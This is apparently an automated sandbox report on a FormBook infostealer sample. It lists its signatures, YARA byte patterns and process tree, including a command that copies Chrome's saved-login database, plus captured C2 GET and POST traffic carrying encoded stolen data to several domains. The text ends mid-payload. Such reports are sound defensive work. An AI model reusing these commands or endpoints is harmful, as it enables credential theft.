Loading ...

Play interactive tourEdit tour

Analysis Report RFQ.exe.vir

Overview

General Information

Sample Name:RFQ.exe.vir (renamed file extension from vir to exe)
MD5:22dc43ed0fab2aca044494cefd0fa2c7
SHA1:e47f39003136287190b347f784122110a12700ed
SHA256:faebab8e94693d16273dfd699a3d5067a241b3d544de0a47dd52008ae782c18d

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RFQ.exe.exe (PID: 4996 cmdline: 'C:\Users\user\Desktop\RFQ.exe.exe' MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
    • RFQ.exe.exe (PID: 5408 cmdline: C:\Users\user\Desktop\RFQ.exe.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
    • RFQ.exe.exe (PID: 4068 cmdline: C:\Users\user\Desktop\RFQ.exe.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
    • RFQ.exe.exe (PID: 2300 cmdline: C:\Users\user\Desktop\RFQ.exe.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
      • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • cmd.exe (PID: 5640 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 5872 cmdline: /c del 'C:\Users\user\Desktop\RFQ.exe.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5452 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • ebplgh1bmx.exe (PID: 2464 cmdline: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
          • ebplgh1bmx.exe (PID: 5728 cmdline: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
        • cmmon32.exe (PID: 2644 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18429:$sqlite3step: 68 34 1C 7B E1
      • 0x1853c:$sqlite3step: 68 34 1C 7B E1
      • 0x18458:$sqlite3text: 68 38 2A 90 C5
      • 0x1857d:$sqlite3text: 68 38 2A 90 C5
      • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      29.2.ebplgh1bmx.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        29.2.ebplgh1bmx.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
        29.2.ebplgh1bmx.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x149a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14491:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14aa7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14c1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x989a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1370c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa593:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19d17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ad1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.2.RFQ.exe.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.2.RFQ.exe.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17629:$sqlite3step: 68 34 1C 7B E1
          • 0x1773c:$sqlite3step: 68 34 1C 7B E1
          • 0x17658:$sqlite3text: 68 38 2A 90 C5
          • 0x1777d:$sqlite3text: 68 38 2A 90 C5
          • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 1 entries

          Sigma Overview


          System Summary:

          barindex
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5640, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 5452

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: RFQ.exe.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exeAvira: detection malicious, Label: HEUR/AGEN.1046691
          Multi AV Scanner detection for domain / URLShow sources
          Source: http://www.artiyonq.com/m8l/Virustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exeVirustotal: Detection: 68%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exeReversingLabs: Detection: 62%
          Multi AV Scanner detection for submitted fileShow sources
          Source: RFQ.exe.exeVirustotal: Detection: 68%Perma Link
          Source: RFQ.exe.exeReversingLabs: Detection: 62%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 29.2.ebplgh1bmx.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.RFQ.exe.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,6_2_00E360DD
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,6_2_00E363F9
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E3EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00E3EB60
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E36CA9 GetFileAttributesW,FindFirstFileW,FindClose,6_2_00E36CA9
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E3F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00E3F5FA
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E3F56F FindFirstFileW,FindClose,6_2_00E3F56F
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E41B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00E41B2F
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E41C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00E41C8A
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E41F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00E41F94

          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 4x nop then pop ebx8_2_00407AC5
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 4x nop then pop esi8_2_00417373
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 4x nop then pop edi8_2_00416D3D
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 4x nop then pop ebx29_2_00407AC5
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 4x nop then pop esi29_2_00417373
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 4x nop then pop edi29_2_00416D3D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop esi30_2_02567373
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi30_2_02566D3D

          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1Host: www.kmwhbl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=lki1ed3GPMN5Nw1jaHFlS3B9RQB9zvXEK7YHw36ZfVLkkOoQWGs0VMlLDODNdBIBI6zD&MR-p=0tPLH85x-lH HTTP/1.1Host: www.addis.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=PZkH6llHoqFvvgYvV7p0jyJ4zE2wugCWkpTMu12MC83jrlv2PlfP15O4FxttxOVUzuUw HTTP/1.1Host: www.teccommunications.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=HCt+Yhx/h4l+FCj3nKRKOvS7Xa1e0tc/Egfr+bgHKkeQjLAOt82B/JBt+eO2F9D4/3gd&MR-p=0tPLH85x-lH HTTP/1.1Host: www.obsoletelabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=5W/5kEIdtxVt3n/xoeTRd2P1yDG4A43nFAD006cGMUhROXoTda6GZj7hA5S0bqxvW5XG&MR-p=0tPLH85x-lH HTTP/1.1Host: www.artiyonq.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=dcH6q++BfneLHwYr+7wkAtOqeHmKUMZpIhb6VvBnwf4Bd/1QFFGV2dHI+mdn934ofCRD HTTP/1.1Host: www.tgers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1Host: www.kmwhbl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.addis.techConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.addis.techUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.addis.tech/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 74 47 75 50 41 39 53 76 64 6f 49 51 66 53 51 4e 65 52 6f 6b 4c 51 35 54 46 41 6c 4f 6b 64 66 5a 62 75 30 44 6b 6e 7e 77 50 48 76 35 68 66 31 4b 53 6b 64 77 64 63 74 50 42 59 47 63 5a 68 34 7a 4a 59 69 34 73 54 4f 54 45 36 36 56 4a 66 53 66 74 7a 43 36 4e 56 37 6d 61 4a 79 73 70 30 46 56 51 31 42 62 47 61 48 4e 4e 6f 6f 41 4f 62 30 6d 54 31 52 5a 45 35 75 74 4b 7a 78 68 50 71 52 35 65 54 43 57 53 7a 49 6c 4c 69 7a 59 6f 72 28 62 4e 55 54 6d 6b 70 44 5a 79 61 7a 53 68 48 50 48 62 74 7e 5a 79 2d 4b 48 65 47 61 6d 38 45 64 2d 68 57 63 6a 6e 31 62 74 50 6e 63 4b 45 4e 67 6c 72 6a 67 46 4f 2d 43 52 4f 52 62 32 6f 53 44 45 71 36 62 58 48 37 76 33 49 4a 6f 74 52 57 73 71 4f 51 28 67 67 52 59 4f 54 49 56 77 6a 6e 7a 57 6e 4a 7e 72 42 61 44 76 70 70 76 5a 70 76 32 37 71 56 6c 79 56 7a 6c 34 36 4f 44 59 7a 66 55 44 65 79 49 6c 69 2d 30 73 74 78 49 4c 59 30 70 5a 4b 4c 48 55 4b 53 6c 6b 54 39 35 39 73 4f 43 45 38 56 53 6f 47 46 51 4e 5a 45 71 38 49 42 6d 4d 78 61 73 76 54 45 6f 6e 62 6a 41 52 51 44 63 44 53 77 36 50 31 6a 75 7a 39 43 73 35 73 76 28 50 31 79 72 64 45 44 39 62 6c 72 78 53 44 30 61 4f 6b 54 4d 4f 58 65 77 36 61 36 42 41 34 4d 36 38 43 34 34 4c 54 4a 43 39 63 36 37 64 43 6a 6e 57 37 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVT=tGuPA9SvdoIQfSQNeRokLQ5TFAlOkdfZbu0Dkn~wPHv5hf1KSkdwdctPBYGcZh4zJYi4sTOTE66VJfSftzC6NV7maJysp0FVQ1BbGaHNNooAOb0mT1RZE5utKzxhPqR5eTCWSzIlLizYor(bNUTmkpDZyazShHPHbt~Zy-KHeGam8Ed-hWcjn1btPncKENglrjgFO-CRORb2oSDEq6bXH7v3IJotRWsqOQ(ggRYOTIVwjnzWnJ~rBaDvppvZpv27qVlyVzl46ODYzfUDeyIli-0stxILY0pZKLHUKSlkT959sOCE8VSoGFQNZEq8IBmMxasvTEonbjARQDcDSw6P1juz9Cs5sv(P1yrdED9blrxSD0aOkTMOXew6a6BA4M68C44LTJC9c67dCjnW7g).
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.nusaliterainspirasi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nusaliterainspirasi.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 67 4e 58 5f 7a 75 72 69 30 6b 50 63 32 61 4e 30 31 4e 46 63 4a 65 38 49 50 6c 48 6a 28 34 62 73 49 72 77 63 6f 4c 45 73 36 6e 62 58 36 50 51 6e 49 44 7a 65 47 41 38 52 4e 47 7e 70 49 5f 73 6e 79 6b 54 71 45 56 7e 55 56 78 69 74 4c 4b 64 50 53 34 6b 79 51 63 37 48 28 51 63 36 30 66 41 37 66 4c 54 56 76 6f 55 4c 7e 2d 70 38 51 55 7e 62 71 6a 7e 39 74 78 53 5a 33 52 53 4f 59 4c 35 4d 36 37 47 72 6a 34 49 46 42 4d 72 4e 56 72 59 48 30 51 4d 75 43 51 4d 41 74 4c 30 71 7a 49 76 67 28 6c 39 37 4c 43 71 76 57 41 73 4e 67 32 4b 38 38 63 6a 36 48 49 55 76 43 59 45 65 36 64 53 59 4b 73 54 2d 6d 34 53 7a 6c 4f 63 74 61 65 35 2d 7a 59 67 32 31 6a 49 58 76 37 45 4c 33 34 51 35 73 6a 79 33 78 53 33 71 7e 49 42 37 34 4a 64 79 39 4a 7a 55 30 67 5a 61 70 31 59 57 4d 6d 38 69 73 58 48 39 51 54 53 35 6d 56 47 49 4d 6b 39 7a 4b 41 34 34 30 61 75 69 7a 39 5a 6e 28 4c 38 76 43 33 68 2d 67 77 7a 6c 39 4c 28 74 4b 6a 52 4c 6e 47 64 4e 73 37 64 68 6d 61 38 2d 59 71 51 46 49 65 5a 79 7e 35 4d 66 62 5a 4c 72 71 5f 47 70 7e 39 79 66 57 35 6e 51 6c 33 6b 6d 68 78 63 79 57 54 37 66 45 4a 34 38 66 72 72 71 6f 5a 47 48 69 4d 6a 4d 6e 5f 33 58 37 52 4a 66 28 59 42 4e 50 74 74 78 63 64 42 75 4d 46 43 38 7a 38 74 4b 30 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVT=gNX_zuri0kPc2aN01NFcJe8IPlHj(4bsIrwcoLEs6nbX6PQnIDzeGA8RNG~pI_snykTqEV~UVxitLKdPS4kyQc7H(Qc60fA7fLTVvoUL~-p8QU~bqj~9txSZ3RSOYL5M67Grj4IFBMrNVrYH0QMuCQMAtL0qzIvg(l97LCqvWAsNg2K88cj6HIUvCYEe6dSYKsT-m4SzlOctae5-zYg21jIXv7EL34Q5sjy3xS3q~IB74Jdy9JzU0gZap1YWMm8isXH9QTS5mVGIMk9zKA440auiz9Zn(L8vC3h-gwzl9L(tKjRLnGdNs7dhma8-YqQFIeZy~5MfbZLrq_Gp~9yfW5nQl3kmhxcyWT7fEJ48frrqoZGHiMjMn_3X7RJf(YBNPttxcdBuMFC8z8tK0g).
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.nusaliterainspirasi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nusaliterainspirasi.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 67 4e 58 5f 7a 72 50 32 34 30 4b 53 6e 5a 6b 42 6b 75 4a 78 4f 4f 6b 77 4e 31 4c 6e 32 4c 4b 62 46 59 30 4d 6f 4c 55 6f 33 46 6a 46 77 4f 67 6e 41 67 58 6e 4f 41 38 4f 63 57 7e 71 4d 5f 68 4f 78 32 54 69 45 58 53 2d 56 78 71 75 41 70 46 58 53 6f 6c 71 66 63 48 53 39 55 4d 78 30 64 45 4b 66 70 66 4e 7e 59 49 4c 36 4b 39 45 4e 41 37 46 6a 47 53 79 6e 68 4f 41 37 77 37 61 59 35 39 65 38 65 6e 4d 31 70 6b 44 4d 66 33 57 51 71 6f 76 69 52 45 31 4d 67 49 48 30 49 4a 77 39 50 66 38 72 41 42 64 58 7a 71 73 49 41 30 44 79 68 76 4a 28 64 33 44 58 4a 6b 37 43 62 6b 4f 67 65 48 41 4f 72 7a 4d 68 63 4c 57 77 76 59 72 47 5f 35 6d 6c 74 4d 4c 35 43 34 6f 68 72 55 4d 79 6f 38 57 76 68 4b 6e 37 54 76 52 75 73 77 30 7a 62 45 4e 35 59 33 63 32 67 6f 4f 67 55 41 46 43 53 49 71 70 55 72 4c 61 54 53 61 6b 56 47 55 45 46 4e 50 50 6d 41 78 74 71 65 66 33 38 42 32 75 72 51 73 48 31 46 36 75 30 61 43 28 36 6e 78 65 67 5a 7a 78 56 78 38 6e 35 41 56 74 36 39 6d 52 49 34 43 49 65 5a 32 7e 38 67 6c 4a 59 66 72 34 61 54 6c 75 75 4b 54 51 35 6e 4e 6a 6e 55 6f 71 6a 49 69 57 58 76 66 45 39 38 53 64 64 50 71 74 50 69 45 6a 74 6a 4d 6b 50 33 58 32 78 49 4d 77 37 73 2d 42 72 67 57 4e 75 67 49 4b 79 53 76 39 64 38 76 6e 37 6d 43 31 59 78 35 77 64 7e 48 45 7a 46 62 55 33 6c 55 6e 73 34 41 6b 79 6a 5f 75 55 6b 7a 55 34 6d 58 52 5a 74 31 6c 71 79 66 72 50 67 70 30 47 6e 6b 44 72 63 34 4c 6d 56 47 79 50 6e 4c 4f 42 4d 72 4b 5f 6a 73 47 6f 42 59 59 45 57 35 6f 55 6a 4f 5a 34 6a 48 76 31 4b 51 39 48 48 52 59 52 65 79 62 56 62 4e 51 4e 36 35 4b 35 72 4f 71 6a 45 5f 52 35 28 61 59 35 6b 36 4f 30 4a 32 61 4a 48 49 71 78 71 41 4e 6e 31 75 58 4a 4c 72 64 76 69 5a 66 61 54 78 59 70 76 57 54 44 45 73 43 56 38 77 57 4b 43 4b 7e 71 42 59 4a 35 54 39 31 6e 73 57 59 77 28 6e 7a 74 70 39 34 79 6f 66 69 43 68 71 39 70 30 48 53 38 28 67 74 47 7a 2d 37 69 43 44 36 6b 4b 6e 47 56 36 49 77 37 67 52 77 79 76 4c 65 45 6e 6f 4e 4a 76 4c 37 47 64 36 31 41 45 64 61 62 71 44 58 73 68 39 5a 32 69 68 30 55 46 42 48 48 74 32 6c 65 36 70 43 50 75 74 65 6a 42 39 4c 52 50 5f 45 2d 51 6a 75 73 39 53 43 39 4c 65 65 7a 69 77 4e 57 56 4c 69 2d 56 38 32 39 71 46 44 53 6e 33 67 58 65 55 43 4e 28 45 30 48 31 79 4e 45 59 67 56 79 41 69 7e 6c 7a 53 35 77 49 4b 72 6c 76 4b 4f 7a 46 6c 61 70 63 30 4f 4c 53 6d 6d 6d 54 61 5a 58 6f 62 46 79 30 31 63 58 37 45 69 50 33 37 6d 6f 52 63 57 5a 4c 36 41 68 78 34 6e 6b 57 32 32 42 5a 39 35 63 76 71 59 58 6f 46 7a 44 66 55 64 4a 44 30 51 76 6e 6a 45 7a 77 42 30 77 4a 55 48 66 35 32 31 41 70 78 7a 6c 71 36 71 52 51 77 51 61 34 6a 71 35 58 31 61 5f 4e 4
